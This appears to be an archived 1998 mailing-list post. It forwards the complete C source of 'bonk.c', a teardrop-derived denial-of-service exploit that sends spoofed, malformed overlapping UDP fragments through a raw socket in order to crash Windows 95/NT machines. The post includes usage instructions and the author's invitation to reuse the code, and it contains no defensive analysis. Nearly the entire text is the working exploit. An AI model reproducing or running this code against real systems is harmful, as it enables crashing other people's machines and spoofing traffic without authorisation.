This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --------------5B3F429C8E3 Content-Type: TEXT/PLAIN; CHARSET=us-ascii Content-ID: <Pine.SUN.3.94.980108151612.18345Dat_private> Goodies from rootsell.com http://www.rootshell.com/archive-Rbf4ahcmxzw5qn2S/199801/bonk.c /* [ http://www.rootshell.com/ ] ==bendi - 1998== bonk.c - 5/01/1998 Based On: teardrop.c by route|daemon9 & klepto Crashes *patched* win95/(NT?) machines. Basically, we set the frag offset > header length (teardrop reversed). There are many theories as to why this works, however i do not have the resources to perform extensive testing. I make no warranties. Use this code at your own risk. Rip it if you like, i've had my fun. */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_udp.h> #include <netinet/protocols.h> #include <arpa/inet.h> #define FRG_CONST 0x3 #define PADDING 0x1c struct udp_pkt { struct iphdr ip; struct udphdr udp; char data[PADDING]; } pkt; int udplen=sizeof(struct udphdr), iplen=sizeof(struct iphdr), datalen=100, psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING, spf_sck; /* Socket */ void usage(void) { fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n"); exit(0); } u_long host_to_ip(char *host_name) { static u_long ip_bytes; struct hostent *res; res = gethostbyname(host_name); if (res == NULL) return (0); memcpy(&ip_bytes, res->h_addr, res->h_length); return (ip_bytes); } void quit(char *reason) { perror(reason); close(spf_sck); exit(-1); } int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt, int dst_prt) { int bs; struct sockaddr_in to; memset(&pkt, 0, psize); /* Fill in ip header */ pkt.ip.version = 4; pkt.ip.ihl = 5; pkt.ip.tot_len = htons(udplen + iplen + PADDING); pkt.ip.id = htons(0x455); pkt.ip.ttl = 255; pkt.ip.protocol = IP_UDP; pkt.ip.saddr = src_addr; pkt.ip.daddr = dst_addr; pkt.ip.frag_off = htons(0x2000); /* more to come */ pkt.udp.source = htons(src_prt); /* udp header */ pkt.udp.dest = htons(dst_prt); pkt.udp.len = htons(8 + PADDING); /* send 1st frag */ to.sin_family = AF_INET; to.sin_port = src_prt; to.sin_addr.s_addr = dst_addr; bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */ pkt.ip.tot_len = htons(iplen + FRG_CONST); /* 2nd frag */ bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); return bs; } void main(int argc, char *argv[]) { u_long src_addr, dst_addr; int i, src_prt=53, dst_prt=53, bs = 1, pkt_count = 10; /* Default amount */ if (argc < 3) usage(); if (argc == 4) pkt_count = atoi(argv[3]); /* 10 does the trick */ /* Resolve hostnames */ src_addr = host_to_ip(argv[1]); if (!src_addr) quit("bad source host"); dst_addr = host_to_ip(argv[2]); if (!dst_addr) quit("bad target host"); spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!spf_sck) quit("socket()"); if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs, sizeof(bs)) < 0) quit("IP_HDRINCL"); for (i = 0; i < pkt_count; ++i) { fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); usleep(10000); } printf("Done.\n"); } --------------5B3F429C8E3--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:38:24 PDT